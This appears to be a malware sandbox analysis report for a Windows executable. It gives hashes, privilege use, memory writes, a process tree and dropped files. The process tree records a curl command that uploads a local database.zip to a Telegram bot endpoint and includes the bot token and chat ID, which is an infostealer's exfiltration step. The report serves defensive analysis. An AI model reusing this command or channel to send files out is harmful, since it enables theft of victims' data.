3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279

Analysis

max time kernel
138s
max time network
134s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
01-09-2024 01:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Size

359KB
MD5

88e5d9d97d0e3c83e74926986d6e5ef6
SHA1

37c8bcfde800dea135577b3254b11c6fe639dc21
SHA256

3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279
SHA512

e4756404059c4daf2e287baa18b81564f5d616fe13e646109a40d7c3a66c11016174dd39a0639d7656e3beb8c4e9de4ab1cde77c470bed873bdd09b979943ece
SSDEEP

6144:+3AtVSBNhoeDUrsi+VmwnJ5D/ArmtPk8Rs9LzIPZ3CpUiS:+QL8LoTrsLFnJ5DY8by5zE3Cy

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeIncreaseQuotaPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeSecurityPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeTakeOwnershipPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeLoadDriverPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeSystemProfilePrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeSystemtimePrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeProfSingleProcessPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeIncBasePriorityPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeCreatePagefilePrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeBackupPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeRestorePrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeShutdownPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeDebugPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeSystemEnvironmentPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeRemoteShutdownPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeUndockPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeManageVolumePrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: 33	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: 34	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: 35	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: 36	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeIncreaseQuotaPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeSecurityPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeTakeOwnershipPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeLoadDriverPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeSystemProfilePrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeSystemtimePrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeProfSingleProcessPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeIncBasePriorityPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeCreatePagefilePrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeBackupPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeRestorePrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeShutdownPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeDebugPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeSystemEnvironmentPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeRemoteShutdownPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeUndockPrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeManageVolumePrivilege	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: 33	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: 34	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: 35	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: 36	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Token: SeIncreaseQuotaPrivilege	2784	WMIC.exe
Token: SeSecurityPrivilege	2784	WMIC.exe
Token: SeTakeOwnershipPrivilege	2784	WMIC.exe
Token: SeLoadDriverPrivilege	2784	WMIC.exe
Token: SeSystemProfilePrivilege	2784	WMIC.exe
Token: SeSystemtimePrivilege	2784	WMIC.exe
Token: SeProfSingleProcessPrivilege	2784	WMIC.exe
Token: SeIncBasePriorityPrivilege	2784	WMIC.exe
Token: SeCreatePagefilePrivilege	2784	WMIC.exe
Token: SeBackupPrivilege	2784	WMIC.exe
Token: SeRestorePrivilege	2784	WMIC.exe
Token: SeShutdownPrivilege	2784	WMIC.exe
Token: SeDebugPrivilege	2784	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2784	WMIC.exe
Token: SeRemoteShutdownPrivilege	2784	WMIC.exe
Token: SeUndockPrivilege	2784	WMIC.exe
Token: SeManageVolumePrivilege	2784	WMIC.exe
Token: 33	2784	WMIC.exe
Token: 34	2784	WMIC.exe
Token: 35	2784	WMIC.exe
Token: 36	2784	WMIC.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4424 wrote to memory of 2784	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe	97
PID 4424 wrote to memory of 2784	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe	97
PID 4424 wrote to memory of 2084	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe	106
PID 4424 wrote to memory of 2084	4424	3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe	106

C:\Users\Admin\AppData\Local\Temp\3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
"C:\Users\Admin\AppData\Local\Temp\3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4424
- C:\Windows\System32\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csv
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2784
- C:\Windows\system32\curl.exe
  "C:\Windows\system32\curl.exe" -X POST -H "content-type: multipart/form-data" -F document=@C:\Users\Admin\AppData\Local\Temp\database.zip -F chat_id=-1002165480850 https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument
  2⤵
  PID:2084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4216,i,16316361669272684588,6171287487746154806,262144 --variations-seed-version --mojo-platform-channel-handle=1440 /prefetch:8
1⤵
PID:2808

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jlbndyhf.w2b.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\database.zip

Filesize
5KB

MD5
a4b9752119d87642eebbee9b173a6dde

SHA1
8650f26bbf66198d43f4ee5909b81b6b35536ebb

SHA256
4b904273ad764ac9c30c86573ab083c856704e152fe9176c1598d2856244df9a

SHA512
6c75ca31bd19e8fad98ac13a7abb9ce1e231f3f13dd1209cbb055cd8afc4fd35eebeccad15f3ff89d3d9eee34e84dfed6065e0a92183852eae0489a6f0d0ef05

Download Submit
memory/4424-16-0x00007FFA25480000-0x00007FFA25F41000-memory.dmp

Filesize
10.8MB

Download
memory/4424-17-0x0000000022490000-0x0000000022652000-memory.dmp

Filesize
1.8MB

Download
memory/4424-2-0x00007FFA25480000-0x00007FFA25F41000-memory.dmp

Filesize
10.8MB

Download
memory/4424-13-0x000000001C300000-0x000000001C322000-memory.dmp

Filesize
136KB

Download
memory/4424-14-0x0000000021680000-0x00000000216AA000-memory.dmp

Filesize
168KB

Download
memory/4424-15-0x0000000021680000-0x00000000216A4000-memory.dmp

Filesize
144KB

Download
memory/4424-0-0x00007FFA25483000-0x00007FFA25485000-memory.dmp

Filesize
8KB

Download
memory/4424-3-0x00007FFA25480000-0x00007FFA25F41000-memory.dmp

Filesize
10.8MB

Download
memory/4424-18-0x00000000233F0000-0x0000000023918000-memory.dmp

Filesize
5.2MB

Download
memory/4424-20-0x00007FFA25483000-0x00007FFA25485000-memory.dmp

Filesize
8KB

Download
memory/4424-21-0x00007FFA25480000-0x00007FFA25F41000-memory.dmp

Filesize
10.8MB

Download
memory/4424-22-0x00007FFA25480000-0x00007FFA25F41000-memory.dmp

Filesize
10.8MB

Download
memory/4424-27-0x0000000022300000-0x0000000022312000-memory.dmp

Filesize
72KB

Download
memory/4424-28-0x00000000222E0000-0x00000000222EA000-memory.dmp

Filesize
40KB

Download
memory/4424-1-0x0000000000720000-0x000000000077E000-memory.dmp

Filesize
376KB

Download
memory/4424-47-0x00007FFA25480000-0x00007FFA25F41000-memory.dmp

Filesize
10.8MB

Download